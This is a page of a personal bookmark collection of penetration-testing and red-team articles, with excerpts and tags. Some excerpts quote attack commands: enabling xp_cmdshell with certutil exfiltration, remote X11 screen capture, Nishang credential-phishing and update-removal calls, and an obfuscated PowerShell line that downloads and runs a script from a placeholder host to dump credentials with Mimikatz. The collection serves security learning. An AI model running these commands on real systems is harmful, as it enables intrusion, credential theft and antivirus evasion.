784 links
  • Shared Bookmarks
  • Home
  • Login
  • RSS Feed
  • ATOM Feed
  • Tag cloud
  • Picture wall
  • Daily
Links per page: 20 50 100
◄Older
page 37 / 40
Newer►
  • thumbnail
    Red Team Tales 0x01: From MSSQL to RCE - Tarlogic Security - Cyber Security and Ethical hacking
    EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

    The procedure to achieve it is as follows:

    Declare a variable of “table” type to save the output that returns the xp_cmdshell procedure (remember that it returns the result in several rows).
    Dump the output of the command to the previous variable.
    Concatenate the rows of the table, separated by a line break.
    Encode the resulting string in Base64 and save it in a variable.
    Generate the certutil command, appending the string with the result.
    Execute it.
    March 28, 2019 at 12:15:52 AM UTC - permalink -
    QRCode
    - https://www.tarlogic.com/en/blog/red-team-tales-0x01/
    htb querier giddy sql sqli mssql windows hacking redteam pentest rce xp_cmdshell
  • thumbnail
    Xp_cmdshell and permissions – Tibor Karaszi's SQL Server blog
    March 28, 2019 at 12:00:51 AM UTC - permalink -
    QRCode
    - http://sqlblog.karaszi.com/xp_cmdshell-and-permissions/
    xp_cmdshell mssql sql shell rce hacking pentest htb giddty querier
  • thumbnail
    Release the Kraken: Starting Your Password Cracking Journey
    Wordlists

    -Weakpass 2.0: https://weakpass.com/download

    • Crackstation: https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm
    • Rockyou: included in Kali Linux - https://www.kali.org/downloads/
    Rules
    • Append_d: adds numbers to the end of a password, i.e. Password -> Password77
    • Append_s: adds special characters to the end of a password, i.e. Password -> Password!
    • Leetspeak: changes passwords to leetspeak, i.e. password -> p4$$w0rd
    March 20, 2019 at 1:30:09 AM UTC - permalink -
    QRCode
    - https://threat.tevora.com/release-the-kraken/
    password cracking crackstation kraken howto tutoriel tutorial wordlists
  • thumbnail
    Pen Test Diary: Cisco Network Penetration Testing
    March 13, 2019 at 9:34:28 PM UTC - permalink -
    QRCode
    - https://pentestdiary.blogspot.com/2017/08/cisco-network-penetration-testing.html
    pentest hackin cisco tuto howto
  • thumbnail
    How to get your new 5 GHz wireless penetration gear up and working
    March 10, 2019 at 5:27:44 PM UTC - permalink -
    QRCode
    - https://medium.com/@adam.toscher/configure-your-new-wireless-ac-1fb65c6ada57
    diy hacking wifi kali kismet
  • thumbnail
    DIY Directional Wifi Antenna Booster – NERDS RULE!
    March 9, 2019 at 5:42:30 PM UTC - permalink -
    QRCode
    - https://nerdsrule.co/2013/02/02/diy-directional-wifi-antenna-booster/
    wifi todo diy hacking directional antenna booster
  • thumbnail
    Doing CTF without paying VPS • Just another infosec blog
    March 9, 2019 at 5:42:00 PM UTC - permalink -
    QRCode
    - https://maki.bzh/stupidthings/dontpayvps/
    vps hosting revshell ngrock self hosted self-hsoted
  • FuzzySecurity | Windows Privilege Escalation Fundamentals
    March 7, 2019 at 7:16:45 PM UTC * - permalink -
    QRCode
    - https://www.fuzzysecurity.com/tutorials/16.html
    windows hacking post exploitation postex privesc privilege escalation fuzzy cheatsheet
  • thumbnail
    The worst of both worlds: Combining NTLM Relaying and Kerberos delegation - dirkjanm.io
    March 7, 2019 at 7:13:22 PM UTC - permalink -
    QRCode
    - https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
    windows hacking mitm mitm6 impacket ntlm relaying kerberos
  • thumbnail
    The Supreme Backdoor Factory - dfir it!
    March 6, 2019 at 4:45:31 PM UTC - permalink -
    QRCode
    - https://dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/
    malware reversing tuto howto re hacking jexplorer java sneaking bot
  • thumbnail
    SQL Injection Cheat Sheet | Netsparker
    March 6, 2019 at 12:48:20 PM UTC - permalink -
    QRCode
    - https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
    netsparker sql injection cheatsheet hacking pentest
  • thumbnail
    X11 Hacking · Zach Grace
    apt-get install x11-utils xutils-dev imagemagick libxext-dev xspy
    xwininfo -root -tree -display 172.16.31.102:0
    xwd -root -screen -silent -display 10.10.10.10:0 > screenshot.xwd
    convert screenshot.xwd screenshot.png

    Watching the display

    ./xwatchwin -u 0.5 172.16.31.102:0 root

    February 26, 2019 at 8:03:36 AM UTC - permalink -
    QRCode
    - https://zachgrace.com/training/x11/
    x11 hacking xwatchwin pentest redteam modbus ics scada ihm
  • thumbnail
    Pass-the-Hash is Dead: Long Live Pass-the-Hash – harmj0y
    February 25, 2019 at 3:46:55 PM UTC - permalink -
    QRCode
    - https://www.harmj0y.net/blog/penetesting/pass-the-hash-is-dead-long-live-pass-the-hash/
    pth pass the hash impacket crackmapexe mimikatz hashes windows pth-winexe pth-toolkit
  • thumbnail
    Practical Usage of NTLM Hashes
    February 25, 2019 at 3:46:04 PM UTC - permalink -
    QRCode
    - https://blog.ropnop.com/practical-usage-of-ntlm-hashes/
    pth pass the hash impacket crackmapexe mimikatz hashes windows pth-winexe pth-toolkit
  • thumbnail
    Nishang: A Post-Exploitation Framework

    Port-Scan

    Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Port-Scan.ps1’; Port-Scan –StartAddress 192.168.56.101 –Endaddress 192.168.56.105 –ResolveHost -ScanPort }”

    Remove-Update

    Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Remove-Update.ps1’; Remove-Update KB2534366}”

    Invoke-CredentialsPhish

    Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Invoke-CredentialsPhish.ps1’; Invoke-CredentialsPhish}”

    February 20, 2019 at 11:00:59 PM UTC - permalink -
    QRCode
    - https://resources.infosecinstitute.com/nishang-a-post-exploitation-framework/
    nishang scripts tool windows post exploitation postex postexploitation hacking pentest powershell
  • thumbnail
    Pwning the Enterprise With PowerShell

    PowerMeta - Discover publicly available files, extract metadata, provide information about internal username schema, system names, domain info ... https://github.com/dathack/PowerMeta
    MailSniper, powercat, empire, unicorn, dnscat2-powershell, invoke-powershellicmp, ...

    February 20, 2019 at 10:17:58 PM UTC - permalink -
    QRCode
    - https://fr.slideshare.net/dafthack/pwning-the-enterprise-with-powershell
    powersploit powershell windows exploitation post postex postexploitation tools mimikatz powermeta mailsniper empire unicorn
  • thumbnail
    Mimikatz (1/4) : présentation, fonctionnement et contre-mesures (tuto de A à Z)
    February 20, 2019 at 2:31:56 PM UTC - permalink -
    QRCode
    - https://fr.scribd.com/document/235639383/Mimikatz-1-4-presentation-fonctionnement-et-contre-mesures-tuto-de-A-a-Z
    mimikatz tutoriel hacking pentest howto
  • thumbnail
    geoda: Running an Obfuscated version of Mimikatz in Memory to bypass AntiVirus and other host based controls

    https://github.com/danielbohannon/Invoke-Obfuscation

    PS > Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation
    Invoke-Obfuscation > set SCRIPTBLOCK "iEX (New-Object System.Net.WebClient).DownloadString('https://<IP>:<PORT>/obfuscated.ps1'); Invoke-Mimidogz -DumpCred
    ...
    February 20, 2019 at 2:24:52 PM UTC - permalink -
    QRCode
    - https://blog.geoda-security.com/2018/05/running-obfuscated-version-of-mimikatz.html
    powershell mimikatz postexploitation postex post exploitation obfuscation kiwi
  • thumbnail
    Shadow Daemon Open-Source Web Application Firewall
    February 20, 2019 at 10:43:39 AM UTC - permalink -
    QRCode
    - https://shadowd.zecure.org/overview/introduction/
    waf web application firewall hacking infra
  • thumbnail
    How to Create sub domains on localhost in apache on Ubuntu – BinaryTides
    February 13, 2019 at 9:10:59 AM UTC - permalink -
    QRCode
    - https://www.binarytides.com/create-localhost-sub-domains-apache-ubuntu/
    subdomain virtualhost apache configuration config locahost
Links per page: 20 50 100
◄Older
page 37 / 40
Newer►
Shaarli - The personal, minimalist, super fast, database-free, bookmarking service by the Shaarli community - Help/documentation